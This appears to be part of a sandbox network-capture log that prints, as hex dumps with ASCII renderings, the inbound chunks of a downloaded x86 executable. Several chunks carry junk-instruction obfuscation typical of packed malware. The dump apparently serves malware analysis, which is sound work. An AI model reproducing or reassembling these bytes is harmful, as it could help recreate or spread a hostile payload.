2022-11-26 10:17:53 UTC	1824	IN	Data Raw: 90 90 90 90 90 90 90 e9 7b ba ff ff 90 90 90 90 90 90 90 90 90 90 90 e9 2b bc ff ff 90 90 90 90 90 90 90 90 90 90 90 e9 db bd ff ff 90 90 90 90 90 90 90 90 90 90 90 55 89 e5 57 56 8d 45 a4 53 83 ec 7c 89 4d a0 89 04 24 89 65 cc c7 45 bc 90 4a 63 00 c7 45 c0 70 90 63 00 89 6d c4 c7 45 c8 cd 8a 5c 00 e8 1e 37 f8 ff 8b 7d a0 8d 4d df c7 44 24 04 00 00 00 00 c7 45 a8 ff ff ff ff 89 3c 24 e8 d1 e9 ff ff 83 ec 08 80 7d df 00 74 6d 8b 7d a0 c7 45 e0 00 00 00 00 8b 07 03 78 f4 8b 8f 84 00 00 00 85 c9 0f 84 8c 00 00 00 8b 11 8b 5f 78 8d 75 e4 89 7c 24 10 89 74 24 18 8d 75 e0 89 74 24 14 c7 44 24 08 00 00 00 00 c7 44 24 0c ff ff ff ff 89 1c 24 c7 44 24 04 ff ff ff ff 8b 42 0c c7 45 a8 01 00 00 00 ff d0 8b 45 08 8b 55 e4 83 ec 1c 89 10 8b 45 e0 85 c0 75 1b 8d 45 a4 Data Ascii: {+UWVES\|M$eEJcEpcmE\7}MD$E<$}tm}Ex_xu\|$t$ut$D$D$$D$BEEUEuE
2022-11-26 10:17:53 UTC	1840	IN	Data Raw: 90 90 90 90 90 90 90 56 53 89 cb 83 ec 24 8b 44 24 30 8b 30 39 31 74 23 8b 56 fc 8d 4e f4 8d 46 fc 85 d2 78 22 f0 83 00 01 8b 03 ba ff ff ff ff f0 0f c1 50 fc 85 d2 7e 2e 89 33 83 c4 24 89 d8 5b 5e c2 04 00 66 90 8d 44 24 1f c7 44 24 04 00 00 00 00 89 04 24 e8 5c f7 ff ff 83 ec 08 89 c6 eb c7 8d 74 26 00 90 83 e8 0c 89 04 24 e8 85 6f 06 00 89 33 eb c5 90 57 56 53 89 cb 83 ec 10 8b 44 24 20 8b 4c 24 24 8b 7c 24 28 8b 10 8b 72 f4 89 f0 29 c8 39 f8 0f 47 c7 39 f1 77 1c 01 ca 89 44 24 04 89 d9 89 14 24 e8 4a fe ff ff 83 ec 08 83 c4 10 5b 5e 5f c2 0c 00 89 74 24 0c 89 4c 24 08 c7 44 24 04 10 05 65 00 c7 04 24 0c 04 65 00 e8 c2 f5 05 00 90 90 e9 1b fe ff ff 90 90 90 90 90 90 90 90 90 90 90 57 56 53 83 ec 10 8b 01 8b 74 24 20 8b 7c 24 24 8b 40 f4 81 fe fc ff ff Data Ascii: VS$D$0091t#VNFx"P~.3$[^fD$D$$\t&$o3WVSD$ L$$\|$(r)9G9wD$$J[^_t$L$D$e$eWVSt$ \|$$@
2022-11-26 10:17:53 UTC	1856	IN	Data Raw: 48 4c a3 63 00 e8 7d b7 f7 ff 8b 16 83 e2 fc 74 76 8b 42 04 39 f8 7d 5c 84 db 74 73 89 f8 89 54 24 18 c1 e0 05 c7 44 24 30 ff ff ff ff 83 c0 08 89 04 24 e8 7f 30 06 00 8b 54 24 18 c7 00 00 00 00 00 89 c1 89 78 04 89 44 24 6c 85 d2 74 0a 8b 1a 89 5c 24 24 85 db 75 5e 8b 06 89 0e 89 44 24 6c 85 c0 74 0f 89 04 24 8d 4c 24 6c e8 b6 37 fa ff 83 ec 04 89 2c 24 e8 db b9 f7 ff 83 c4 7c 5b 5e 5f 5d c2 08 00 90 31 c0 eb 89 8d 74 26 00 89 44 24 18 db 44 24 18 d8 0d 18 1d 65 00 dd 5c 24 18 f2 0f 2c 44 24 18 39 c7 0f 4c f8 e9 6b ff ff ff 8d b6 00 00 00 00 8d 58 08 8b 44 24 24 8d 7a 08 c1 e0 05 01 f8 89 44 24 18 39 c7 0f 84 95 00 00 00 83 c2 10 89 74 24 28 89 d6 eb 59 8d b4 26 00 00 00 00 8d 76 00 89 03 8b 47 08 89 43 08 8b 47 04 89 f9 83 c3 20 83 c7 20 89 43 e4 8b 47 Data Ascii: HLc}tvB9}\tsT$D$0$0T$xD$lt\$$u^D$lt$L$l7,$\|[^_]1t&D$D$e\$,D$9LkXD$$zD$9t$(Y&vGCG CG
2022-11-26 10:17:53 UTC	1872	IN	Data Raw: 45 b0 89 45 d0 8b 45 b4 89 45 d4 8b 45 b8 89 45 d8 8b 45 bc 89 45 dc e9 34 f9 ff ff 0f b7 75 d0 66 89 32 e9 56 ff ff ff 8b 45 08 8b 8d 68 ff ff ff 8b 40 04 89 44 24 04 8b 45 08 8b 00 c7 85 78 ff ff ff 01 00 00 00 89 04 24 e8 68 bb 03 00 83 ec 08 e9 d3 f7 ff ff 0f b7 5d d0 66 89 18 eb 89 8b 55 08 8b 72 04 8b 12 89 95 6c ff ff ff ba ff ff ff 1f 29 c2 89 b5 70 ff ff ff 39 d6 0f 87 82 00 00 00 8b 85 70 ff ff ff 8b b5 6c ff ff ff 89 d9 c7 85 78 ff ff ff 01 00 00 00 89 44 24 04 89 34 24 e8 10 bb 03 00 8b b5 68 ff ff ff b8 ff ff ff 1f 83 ec 08 2b 46 04 39 85 70 ff ff ff 77 39 8b 85 70 ff ff ff 8b 8d 68 ff ff ff c7 85 78 ff ff ff 01 00 00 00 89 44 24 04 8b 85 6c ff ff ff 89 04 24 e8 cf ba 03 00 e9 62 ff ff ff c7 04 24 7e 1b 65 00 e8 56 23 06 00 c7 04 24 7e 1b 65 Data Ascii: EEEEEEEE4uf2VEh@D$Ex$h]fUrl)p9plxD$4$h+F9pw9phxD$l$b$~eV#$~e
2022-11-26 10:17:53 UTC	1888	IN	Data Raw: ff 90 90 90 90 90 90 55 57 56 53 83 ec 08 8b 78 04 89 14 24 8b 10 29 d7 74 65 0f b6 0a 84 c9 79 46 be ff ff ff ff 80 f9 c1 76 44 80 f9 df 77 67 83 ff 01 74 4a 0f b6 7a 01 89 fd 83 e5 c0 89 eb 80 fb 80 75 2a 89 fb c1 e1 06 0f b6 fb 8d b4 39 80 cf ff ff 39 34 24 72 16 83 c2 02 89 10 eb 0f 8d b4 26 00 00 00 00 83 c2 01 0f b6 f1 89 10 83 c4 08 89 f0 5b 5e 5f 5d c3 8d b6 00 00 00 00 83 c4 08 be fe ff ff ff 5b 89 f0 5e 5f 5d c3 8d b4 26 00 00 00 00 66 90 80 f9 ef 77 6b be fe ff ff ff 83 ff 02 76 c9 0f b6 7a 01 be ff ff ff ff 89 fd 83 e5 c0 89 eb 80 fb 80 75 b4 80 f9 e0 75 07 89 fb 80 fb 9f 76 a8 0f b6 6a 02 be ff ff ff ff 89 eb 83 e3 c0 80 fb 80 75 95 89 fb c1 e1 0c 0f b6 fb 89 eb c1 e7 06 0f b6 eb 01 f9 8d b4 29 80 df f1 ff 39 34 24 0f 82 73 ff ff ff 83 c2 03 Data Ascii: UWVSx$)teyFvDwgtJzu*994$r&[^_][^_]&fwkvzuuvju)94$s
2022-11-26 10:17:53 UTC	1904	IN	Data Raw: 00 00 00 e8 0f 7a 02 00 89 d9 e8 38 7a 02 00 89 1c 24 e8 e0 6f 05 00 89 34 24 e8 38 fa f6 ff 83 c4 54 5b 5e c3 90 90 56 53 89 cb 83 ec 54 8d 74 24 1c c7 44 24 34 90 4a 63 00 89 34 24 c7 44 24 38 3c 81 63 00 e8 3d f7 f6 ff c7 03 5c 8e 65 00 8b 4b 0c f0 83 69 04 01 75 05 8b 01 ff 50 04 8d 43 08 c7 03 6c a6 65 00 89 04 24 c7 44 24 20 00 00 00 00 e8 9f 79 02 00 89 d9 e8 c8 79 02 00 89 34 24 e8 d0 f9 f6 ff 83 c4 54 5b 5e c3 90 90 90 90 90 90 90 90 90 90 56 53 89 cb 83 ec 54 8d 74 24 1c c7 44 24 34 90 4a 63 00 89 34 24 c7 44 24 38 1c 86 63 00 e8 cd f6 f6 ff c7 03 78 8e 65 00 8b 4b 0c f0 83 69 04 01 75 05 8b 01 ff 50 04 8d 43 08 c7 03 54 97 65 00 89 04 24 c7 44 24 20 00 00 00 00 e8 2f 79 02 00 89 d9 e8 58 79 02 00 89 34 24 e8 60 f9 f6 ff 83 c4 54 5b 5e c3 90 90 Data Ascii: z8z$o4$8T[^VSTt$D$4Jc4$D$8<c=\eKiuPCle$D$ yy4$T[^VSTt$D$4Jc4$D$8cxeKiuPCTe$D$ /yXy4$`T[^
2022-11-26 10:17:53 UTC	1920	IN	Data Raw: b8 ff ff ff ff ff d0 8b 55 10 8b 4d 0c 66 89 42 12 8b 45 0c 8b 00 ff 50 0c 8b 55 10 8b 4d 0c 66 89 42 14 8b 45 0c 8b 00 ff 50 20 8b 55 10 8d 4d f4 89 42 30 8b 45 0c c7 42 08 00 00 00 00 c7 42 18 00 00 00 00 8b 00 c7 42 20 00 00 00 00 c7 42 28 00 00 00 00 c6 42 52 01 8b 55 0c 89 14 24 ff 50 10 8b 45 f4 83 ec 04 8b 40 f4 c7 45 b8 01 00 00 00 89 45 b0 83 c0 01 89 04 24 e8 97 2f 05 00 8b 55 b0 c7 44 24 08 00 00 00 00 89 04 24 89 54 24 04 8d 55 f4 89 d1 89 45 ac e8 a8 0f f9 ff 8b 4d ac 8b 45 b0 83 ec 0c 8b 55 10 c6 04 01 00 89 4a 08 8b 4d f4 89 42 0c b8 ff ff ff ff f0 0f c1 41 fc 85 c0 0f 8e 05 02 00 00 8b 45 0c 8b 55 0c 8d 4d f4 8b 00 89 14 24 8b 40 14 c7 45 b8 ff ff ff ff ff d0 8b 45 f4 83 ec 04 8b 40 f4 89 45 b0 83 c0 01 3d fe ff ff 3f 0f 87 3b 02 00 00 8d Data Ascii: UMfBEPUMfBEP UMB0EBBB B(BRU$PE@EE$/UD$$T$UEMEUJMBAEUM$@EE@E=?;
2022-11-26 10:17:53 UTC	1936	IN	Data Raw: 90 90 90 90 90 90 90 55 57 56 53 89 cb 83 ec 3c c7 01 ff ff ff ff 8b 44 24 54 8b 74 24 50 c7 41 04 ff ff ff ff c7 41 08 00 00 00 00 89 44 24 20 8b 44 24 58 8d 7e 24 89 f9 89 44 24 24 8b 44 24 5c 89 44 24 28 e8 bd 20 f9 ff 84 c0 74 60 80 7e 54 00 74 27 8b 46 04 31 d2 39 46 08 c6 46 54 00 8b 46 4c 0f 95 c2 8b 4e 3c 8d 04 50 8b 56 50 89 4e 04 89 46 4c 89 46 08 89 56 0c 8b 44 24 20 8b 54 24 24 89 f1 8b 6c 24 28 89 44 24 18 89 54 24 1c e8 01 ee ff ff 84 c0 75 25 31 ed b8 ff ff ff ff ba ff ff ff ff 89 03 89 53 04 89 6b 08 83 c4 3c 89 d8 5b 5e 5f 5d c2 18 00 8d 74 26 00 90 8b 44 24 18 8b 54 24 1c c7 44 24 08 00 00 00 00 89 f9 89 04 24 89 54 24 04 e8 ca 4b ff ff 89 c1 83 ec 0c 21 d1 83 f9 ff 74 3e 31 c9 c7 46 14 00 00 00 00 66 89 4e 45 8b 4e 5c c7 46 10 00 00 00 Data Ascii: UWVS<D$Tt$PAAD$ D$X~$D$$D$\D$( t`~Tt'F19FFTFLN<PVPNFLFVD$ T$$l$(D$T$u%1Sk<[^_]t&D$T$D$$T$K!t>1FfNEN\F
2022-11-26 10:17:53 UTC	1952	IN	Data Raw: 40 20 8a 5e 00 89 64 24 44 e8 79 37 f6 ff 8b 44 24 18 c7 00 4c 9c 65 00 8d 48 0c c7 40 78 74 9c 65 00 c7 40 08 60 9c 65 00 c7 40 0c cc 9b 65 00 c7 44 24 20 01 00 00 00 e8 8a b5 ff ff 8b 44 24 18 8d 48 30 e8 fe 0f ff ff 8b 44 24 18 c7 40 0c a8 9e 65 00 8d 48 28 e8 1b be 01 00 8b 44 24 18 c7 40 08 20 52 65 00 8d 48 78 c7 00 bc 51 65 00 c7 40 04 00 00 00 00 c7 40 78 bc a8 65 00 e8 24 e3 03 00 8d 44 24 1c 89 04 24 e8 c8 39 f6 ff 83 c4 5c 5b 5e 5f 5d c3 8b 44 24 24 89 04 24 e8 94 b1 04 00 c7 44 24 20 00 00 00 00 e8 57 b4 04 00 eb 8b 90 90 90 90 90 55 57 56 53 83 ec 5c 8d 44 24 1c 89 4c 24 18 89 04 24 c7 44 24 34 90 4a 63 00 c7 44 24 38 04 8f 63 00 89 6c 24 3c c7 44 24 40 27 8b 5e 00 89 64 24 44 e8 99 36 f6 ff 8b 44 24 70 8b 74 24 18 8b 7c 24 70 8b 00 8d 4e 0c Data Ascii: @ ^d$Dy7D$LeH@xte@`e@eD$ D$H0D$@eH(D$@ ReHxQe@@xe$D$$9\[^_]D$$$D$ WUWVS\D$L$$D$4JcD$8cl$<D$@'^d$D6D$pt$\|$pN
2022-11-26 10:17:53 UTC	1968	IN	Data Raw: 83 ec 6c 8b 45 08 89 4d a0 89 34 24 89 45 9c 89 65 cc c7 45 bc 90 4a 63 00 c7 45 c0 6c 94 63 00 89 6d c4 c7 45 c8 9c ca 5e 00 e8 58 f7 f5 ff 8b 5d a0 8b 03 c7 43 04 00 00 00 00 8b 48 f4 01 d9 8b 41 14 c7 45 a8 ff ff ff ff 83 e0 fd 89 04 24 e8 22 c7 03 00 8b 5d a0 8d 4d e7 83 ec 04 c7 44 24 04 01 00 00 00 89 1c 24 e8 69 f5 ff ff 83 ec 08 80 7d e7 00 74 2f 8b 5d a0 8b 03 03 58 f4 8b 4b 78 89 d8 85 c9 74 49 8b 41 08 39 41 04 73 67 0f b7 50 fe 66 39 55 9c 75 5d 83 e8 02 89 41 08 66 83 fa ff 74 21 8d 45 a4 89 04 24 e8 a6 f9 f5 ff 8b 45 a0 8d 65 f4 5b 5e 5f 5d c2 04 00 8d b4 26 00 00 00 00 66 90 8b 7d a0 8b 07 03 78 f4 89 f8 8b 50 14 89 c1 c7 45 a8 ff ff ff ff 83 ca 01 89 14 24 e8 8f c6 03 00 83 ec 04 eb b9 8d b4 26 00 00 00 00 8d 76 00 8b 11 0f b7 45 9c 89 04 Data Ascii: lEM4$EeEJcElcmE^X]CHAE$"]MD$$i}t/]XKxtIA9AsgPf9Uu]Aft!E$Ee[^_]&f}xPE$&vE
2022-11-26 10:17:53 UTC	1984	IN	Data Raw: 85 c0 7e 13 83 c4 28 89 d9 5b e9 78 8e 03 00 8d b4 26 00 00 00 00 90 8d 44 24 1f 83 e9 0c 89 04 24 e8 a1 b6 fd ff 89 d9 83 ec 04 83 c4 28 5b e9 53 8e 03 00 90 90 90 56 53 89 cb 83 ec 54 8d 74 24 1c c7 44 24 34 90 4a 63 00 89 34 24 c7 44 24 38 14 82 63 00 e8 2d b7 f5 ff 8b 44 24 60 8d 4b 04 c7 44 24 20 00 00 00 00 83 c0 04 89 04 24 e8 93 bf fd ff 83 ec 04 89 34 24 e8 d8 b9 f5 ff 83 c4 54 89 d8 5b 5e c2 04 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 56 53 89 cb 83 ec 54 8d 74 24 1c c7 44 24 34 90 4a 63 00 89 34 24 c7 44 24 38 10 82 63 00 e8 cd b6 f5 ff 8b 44 24 60 8d 4b 04 c7 44 24 20 00 00 00 00 83 c0 04 89 04 24 e8 33 bf fd ff 83 ec 04 89 34 24 e8 78 b9 f5 ff 83 c4 54 89 d8 5b 5e c2 04 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 eb 05 fe 4e 5c c2 54 8b Data Ascii: ~([x&D$$([SVSTt$D$4Jc4$D$8c-D$`KD$ $4$T[^VSTt$D$4Jc4$D$8cD$`KD$ $34$xT[^N\T
2022-11-26 10:17:53 UTC	2000	IN	Data Raw: 75 0a 8b 4d bc e8 cd ea fe ff eb c8 0f 0b 90 90 90 90 90 90 90 90 90 55 89 e5 83 ec 58 8d 45 c4 89 4d c0 89 04 24 89 65 ec c7 45 dc 90 4a 63 00 c7 45 e0 b8 8b 63 00 89 6d e4 c7 45 e8 a0 4a 5f 00 e8 41 77 f5 ff 8b 45 08 8b 4d c0 8b 40 04 89 01 03 48 f4 8b 45 08 8b 40 08 89 01 c7 04 24 00 00 00 00 c7 45 c8 ff ff ff ff e8 18 3b 03 00 8b 45 08 8b 4d c0 8b 55 08 83 ec 04 8b 00 8b 52 0c 89 01 8b 40 f4 89 14 01 8d 41 04 89 c1 c7 45 c8 01 00 00 00 89 45 bc e8 3b e5 fe ff 8b 55 c0 8b 02 03 50 f4 8b 45 bc c7 45 c8 02 00 00 00 89 d1 89 04 24 e8 cf 3a 03 00 8b 45 10 83 ec 04 8b 4d bc 83 c8 10 89 44 24 04 8b 45 0c 89 04 24 e8 a4 cc fe ff 8b 4d c0 83 ec 08 8b 11 03 4a f4 85 c0 74 25 c7 04 24 00 00 00 00 c7 45 c8 02 00 00 00 e8 22 3c 03 00 83 ec 04 8d 45 c4 89 04 24 e8 Data Ascii: uMUXEM$eEJcEcmEJ_AwEM@HE@$E;EMUR@AEE;UPEE$:EMD$E$MJt%$E"<E$
2022-11-26 10:17:53 UTC	2016	IN	Data Raw: 90 90 90 90 90 90 90 8b 44 24 04 c7 01 68 9e 65 00 83 c1 1c 8b 50 04 83 c0 1c 89 51 e8 8b 50 ec 89 51 ec 8b 50 f0 89 51 f0 8b 50 f4 89 51 f4 8b 50 f8 89 51 f8 8b 50 fc 89 51 fc 89 44 24 04 e9 93 bc 00 00 90 90 90 c7 01 68 9e 65 00 83 c1 1c c7 41 e8 00 00 00 00 c7 41 ec 00 00 00 00 c7 41 f0 00 00 00 00 c7 41 f4 00 00 00 00 c7 41 f8 00 00 00 00 c7 41 fc 00 00 00 00 e9 78 bc 00 00 90 90 90 90 90 90 90 90 53 89 cb 8d 49 1c 83 ec 18 c7 41 e4 68 9e 65 00 e8 db bd 00 00 89 1c 24 e8 53 af 03 00 83 c4 18 5b c3 90 90 90 90 90 90 90 90 90 90 90 90 90 90 c7 01 68 9e 65 00 83 c1 1c e9 b2 bd 00 00 90 90 c7 01 68 9e 65 00 83 c1 1c e9 a2 bd 00 00 90 90 53 89 cb 8d 49 1c 83 ec 18 8b 44 24 20 8b 50 04 83 c0 1c 89 51 e8 8b 50 ec 89 51 ec 8b 50 f0 89 51 f0 8b 50 f4 89 51 f4 Data Ascii: D$hePQPQPQPQPQPQD$heAAAAAAxSIAhe$S[heheSID$ PQPQPQPQ
2022-11-26 10:17:53 UTC	2032	IN	Data Raw: ff 8d 65 f8 5e 5f 5d c2 08 00 8d 74 26 00 90 8b 45 ac 80 78 01 00 74 de eb c4 8d 74 26 00 90 8b 45 ac c7 44 24 08 00 00 00 00 c7 45 b8 01 00 00 00 89 44 24 04 8d 45 f4 89 04 24 e8 67 79 00 00 8b 45 f4 8b 4d b0 c7 44 24 04 00 00 00 00 89 04 24 e8 31 83 fd ff 83 ec 08 8d 45 f4 89 04 24 e8 b3 79 00 00 eb 90 8b 45 bc 89 45 ac 8b 45 b8 85 c0 75 1a 8b 4d b0 e8 7c 88 fd ff 8b 45 ac c7 45 b8 ff ff ff ff 89 04 24 e8 ba fb f4 ff 83 e8 01 75 1a 8b 4d b0 e8 ad 79 00 00 8b 45 ac c7 45 b8 ff ff ff ff 89 04 24 e8 9b fb f4 ff 0f 0b 90 90 90 90 90 90 90 90 90 55 89 e5 57 56 8d 45 b4 83 ec 60 89 4d b0 89 04 24 c7 45 cc 90 4a 63 00 c7 45 d0 d0 96 63 00 89 6d d4 c7 45 d8 47 cb 5f 00 89 65 dc e8 9f f6 f4 ff 8b 55 0c 31 c0 85 d2 8b 55 b0 0f 95 c0 89 42 04 89 d1 c7 02 8c 99 65 Data Ascii: e^_]t&Extt&ED$ED$E$gyEMD$$1E$yEEEuM\|EE$uMyEE$UWVE`M$EJcEcmEG_eU1UBe
2022-11-26 10:17:53 UTC	2048	IN	Data Raw: 8b 41 44 39 d0 74 12 8b 49 4c 89 04 24 8d 51 01 89 54 24 04 e8 ee 2f 03 00 8b 43 40 85 c0 74 0e 89 04 24 8d 4b 40 e8 fc 37 f7 ff 83 ec 04 8b 43 28 8d 53 30 39 d0 74 13 8b 53 30 89 04 24 8d 54 12 02 89 54 24 04 e8 bc 2f 03 00 8b 43 24 85 c0 74 0e 89 04 24 8d 4b 24 e8 ca 37 f7 ff 83 ec 04 8b 43 0c 8d 53 14 39 d0 74 13 8b 53 14 89 04 24 8d 54 12 02 89 54 24 04 e8 8a 2f 03 00 83 c4 18 5b c3 90 90 90 90 90 53 8d 59 0c 83 ec 18 8b 44 24 20 3d 88 a9 65 00 74 1b c7 04 24 38 5e 65 00 89 c1 e8 80 fd fb ff 83 ec 04 84 c0 b8 00 00 00 00 0f 44 d8 83 c4 18 89 d8 5b c2 04 00 90 90 90 90 90 90 90 90 90 90 83 ec 1c c7 44 24 04 5c 00 00 00 89 0c 24 e8 2d 2f 03 00 83 c4 1c c3 90 90 90 90 90 90 90 90 90 c3 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 53 89 cb 83 ec 18 c7 01 Data Ascii: AD9tIL$QT$/C@t$K@7C(S09tS0$TT$/C$t$K$7CS9tS$TT$/[SYD$ =et$8^eD[D$\$-/S
2022-11-26 10:17:53 UTC	2064	IN	Data Raw: 00 59 89 45 ac 8b 45 b8 52 eb 0f 49 9f 10 c8 85 a6 76 47 91 d7 01 41 fa fc 58 52 8b 00 89 45 b4 51 b9 86 2f 00 00 59 8b 45 b8 8b 40 04 89 45 a8 8b 45 08 2b 45 b4 89 45 bc 8b 45 ac e8 14 11 e0 ff c7 45 c8 01 00 00 00 52 ba 2b 7e 00 00 ba c5 1f 00 00 ba 35 15 00 00 ba 10 12 00 00 5a 89 45 c0 8b 45 bc 03 45 c0 89 45 bc 8b 45 0c 8b 4d bc 52 ba 1e 1e 00 00 ba 3a 3b 00 00 ba 7c 67 00 00 ba 90 50 00 00 5a 89 04 24 e8 a1 4e f6 ff 8b 45 b4 51 8b 4d c0 89 45 bc 8d 41 30 89 45 b0 8b 45 bc 51 b9 6f 4d 00 00 b9 25 34 00 00 59 39 45 08 74 3d 89 04 24 e8 01 4e f6 ff eb 0f e8 15 17 bd fe 65 b1 33 16 79 31 6c 50 f3 a5 eb 0f bf 50 97 50 58 0e 3a f0 f7 15 67 dd 68 b6 23 8b 4d bc 52 90 e8 11 50 f6 ff 83 45 bc 30 8b 4d b0 eb a9 8b 55 bc 39 55 a8 0f 84 c2 01 00 00 89 14 24 8b Data Ascii: YEERIvGAXREQ/YE@EE+EEEER+~5ZEEEEEMR:;\|gPZ$NEQMEA0EEQoM%4Y9Et=$Ne3y1lPPPX:gh#MRPE0MU9U$
2022-11-26 10:17:53 UTC	2080	IN	Data Raw: ec 08 8d 45 c4 89 04 24 e8 4a 3a f4 ff c9 c2 08 00 8b 45 cc 8b 4d c0 89 45 bc e8 28 ba ff ff 8b 45 bc c7 45 c8 ff ff ff ff 89 04 24 e8 16 3c f4 ff 90 90 90 90 90 90 55 89 e5 83 ec 58 8d 45 c4 89 4d c0 89 04 24 c7 45 dc 90 4a 63 00 c7 45 e0 84 87 63 00 89 6d e4 c7 45 e8 37 8a 60 00 89 65 ec e8 21 37 f4 ff 8b 55 10 8b 4d c0 31 c0 85 d2 c7 01 a8 93 65 00 0f 95 c0 c7 41 08 00 00 00 00 89 41 04 8b 45 0c c7 45 c8 01 00 00 00 89 44 24 04 8b 45 08 89 04 24 e8 fb fb ff ff 83 ec 08 8d 45 c4 89 04 24 e8 ad 39 f4 ff c9 c2 0c 00 8b 45 cc 8b 4d c0 89 45 bc e8 8b b9 ff ff 8b 45 bc c7 45 c8 ff ff ff ff 89 04 24 e8 79 3b f4 ff 90 90 90 90 90 90 90 90 90 55 89 e5 83 ec 58 8d 45 c4 89 4d c0 89 04 24 c7 45 dc 90 4a 63 00 c7 45 e0 6c 87 63 00 89 6d e4 c7 45 e8 db 8a 60 00 89 Data Ascii: E$J:EME(EE$<UXEM$EJcEcmE7`e!7UM1eAAEED$E$E$9EMEEE$y;UXEM$EJcElcmE`
2022-11-26 10:17:53 UTC	2096	IN	Data Raw: 89 03 89 c7 8b 44 24 1c 89 43 08 89 3c 24 89 6c 24 08 89 74 24 04 e8 24 6d f5 ff 8b 44 24 1c 8b 3b eb a8 c7 04 24 54 1b 65 00 e8 58 a2 02 00 90 90 90 90 90 90 90 90 56 8d 71 08 53 8b 44 24 0c 89 31 8b 18 8d 50 08 39 da 74 24 89 19 8b 58 08 89 59 08 8b 58 04 89 10 c7 40 04 00 00 00 00 c6 40 08 00 89 59 04 5b 5e c2 04 00 8d 74 26 00 8b 58 08 89 59 08 8b 5a 04 89 59 0c 8b 5a 08 89 59 10 8b 5a 0c 89 59 14 eb ca 90 90 90 90 90 90 90 90 90 90 90 90 90 90 56 8d 71 08 53 8b 44 24 0c 89 31 8b 18 8d 50 08 39 da 74 24 89 19 8b 58 04 89 10 89 59 04 8b 58 08 c7 40 04 00 00 00 00 c6 40 08 00 89 59 08 5b 5e c2 08 00 8d 74 26 00 8b 58 08 89 59 08 8b 5a 04 89 59 0c 8b 5a 08 89 59 10 8b 52 0c 89 51 14 8b 50 04 c7 40 04 00 00 00 00 8b 00 89 51 04 c6 00 00 5b 5e c2 08 00 90 Data Ascii: D$C<$l$t$$mD$;$TeXVqSD$1P9t$XYX@@Y[^t&XYZYZYZYVqSD$1P9t$XYX@@Y[^t&XYZYZYRQP@Q[^
2022-11-26 10:17:53 UTC	2112	IN	Data Raw: b8 9f d6 92 d4 f1 4f 90 bb c9 31 cb 9e 63 8a aa e3 ee dc fa c6 1b 03 52 5a 89 45 d0 8b 45 14 eb 0f a7 3a a4 da 8f 30 16 b9 a5 cc ef 2d ca f8 87 29 d0 ba 07 00 00 00 eb 0f 26 55 0f 8d 3c 4a da 1f 65 0e e5 42 5d 73 ce 50 b8 b6 79 00 00 b8 a6 54 00 00 58 eb 0f fb 32 89 ad ee 2b 32 b4 b3 b3 31 e7 1f de c6 01 c8 89 45 e4 8d 47 08 39 07 50 52 ba d3 44 00 00 ba 2c 38 00 00 5a b8 9c 0b 00 00 58 50 58 74 03 8b 57 08 8d 45 e4 e8 da 54 df ff 89 45 d4 85 db 74 17 8b 07 89 5c 24 08 89 44 24 04 52 5a 8b 45 d4 89 04 24 e8 a8 ee ff ff 83 7d 10 00 74 4d 83 7d 14 00 74 47 8b 45 14 89 44 24 08 8b 45 10 89 44 24 04 52 50 b8 e4 49 00 00 b8 37 23 00 00 b8 0d 7d 00 00 b8 cf 02 00 00 58 51 b9 78 45 00 00 b9 bd 34 00 00 59 5a eb 05 6a bc fc ee fe 8d 04 1b 03 45 d4 89 04 24 e8 55 Data Ascii: O1cRZEE:0-)&U<JeB]sPyTX2+21EG9PRD,8ZXPXtWETEt\$D$RZE$}tM}tGED$ED$RPI7#}XQxE4YZjE$U
2022-11-26 10:17:53 UTC	2128	IN	Data Raw: fc fe ff 8b b5 70 ff ff ff 8d 55 a8 83 ec 04 8b 06 89 f1 89 14 24 8b 40 08 c7 85 78 ff ff ff 02 00 00 00 ff d0 8d 7d a8 83 ec 04 8b 8d 6c ff ff ff 89 3c 24 e8 7e fe fe ff 89 d9 83 ec 04 e8 34 fe fe ff 89 f9 e8 2d fe fe ff 8b 5d 08 8b 45 08 8b b5 70 ff ff ff 8b 40 20 89 df 8b 53 24 83 c7 2c 89 46 20 8b 46 24 89 bd 6c ff ff ff 39 fa 0f 84 aa 01 00 00 8b 5d 08 8b 4b 28 8b 9d 70 ff ff ff 83 c3 2c 39 d8 0f 84 2b 01 00 00 8b b5 70 ff ff ff 89 56 24 8b 55 08 89 4e 28 8b 5e 2c 8b 52 2c 89 56 2c 85 c0 0f 84 20 01 00 00 8b 55 08 89 42 24 89 5a 2c 8b 55 08 c7 42 28 00 00 00 00 89 d3 c6 00 00 8b 42 24 89 df 8b 52 20 8b 5b 28 89 d6 01 c3 83 e2 10 83 e6 08 3b 85 6c ff ff ff 0f 84 8a 01 00 00 8b 4f 2c 01 c1 85 f6 0f 84 f5 00 00 00 8b 7d 08 89 47 04 89 47 08 89 5f 0c 85 Data Ascii: pU$@x}l<$~4-]Ep@ S$,F F$l9]K(p,9+pV$UN(^,R,V, UB$Z,UB(B$R [(;lO,}GG_
2022-11-26 10:17:53 UTC	2144	IN	Data Raw: fe ff 8b 55 b0 8b 45 08 83 ec 08 c7 02 a0 95 65 00 80 38 43 74 31 8b 75 08 bf 14 09 65 00 b9 06 00 00 00 f3 a6 0f 97 c0 1c 00 84 c0 75 29 8d 45 b4 89 04 24 e8 1e 3a f3 ff 8d 65 f8 5e 5f 5d c2 08 00 8d 74 26 00 90 8b 45 08 80 78 01 00 74 de eb c4 8d 74 26 00 90 8b 45 08 c7 44 24 08 00 00 00 00 c7 45 b8 01 00 00 00 89 44 24 04 8d 45 f4 89 04 24 e8 2f b9 fe ff 8b 45 f4 8b 4d b0 c7 44 24 04 00 00 00 00 89 04 24 e8 49 ef fe ff 83 ec 08 8d 45 f4 89 04 24 e8 7b b9 fe ff eb 90 8b 45 bc 89 45 ac 8b 45 b8 85 c0 75 1a 8b 4d b0 e8 d4 f4 fe ff 8b 45 ac c7 45 b8 ff ff ff ff 89 04 24 e8 82 3b f3 ff 83 e8 01 75 1a 8b 4d b0 e8 75 b9 fe ff 8b 45 ac c7 45 b8 ff ff ff ff 89 04 24 e8 63 3b f3 ff 0f 0b 90 55 89 e5 57 56 8d 45 b4 83 ec 60 89 4d b0 89 04 24 c7 45 cc 90 4a 63 00 Data Ascii: UEe8Ct1ueu)E$:e^_]t&Extt&ED$ED$E$/EMD$$IE${EEEuMEE$;uMuEE$c;UWVE`M$EJc
